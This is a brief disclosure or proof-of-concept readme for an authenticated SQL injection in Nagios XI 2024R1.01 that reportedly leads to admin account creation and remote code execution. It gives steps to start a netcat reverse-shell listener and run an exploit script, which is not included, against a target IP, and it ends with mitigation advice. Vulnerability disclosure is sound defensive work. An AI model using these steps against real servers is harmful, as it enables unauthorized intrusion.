CVE Disovered by: Jarod Jaslow (MAWK)
(DESIGNED TO BE RUN ON KALI LINUX)
- Endpoint:
/nagiosxi//config/monitoringwizard.php
Nagios XI Version 2024R1.01 - Vulnerability Type: Authenticated SQL Injection
- Exploitation Result: Admin account creation and full remote code execution
-
Start a local listener on the attacker machine using netcat:
nc -nlvp 4444
. -
Execute the provided Python script with the correct arguments:
python3 MawkiNagiosXIPOC.py <target IP> <Local Listening IP> <NC listening port>
Attached is the Python script demonstrating the vulnerability
To mitigate the risk of SQL injection, it is strongly advised to use parameterized queries or prepared statements when interacting with databases. Parameterized queries ensure that user input is treated as data, not executable code, making it much more difficult for attackers to inject malicious SQL statements.
This should be mitigated in recent updates.
CVE: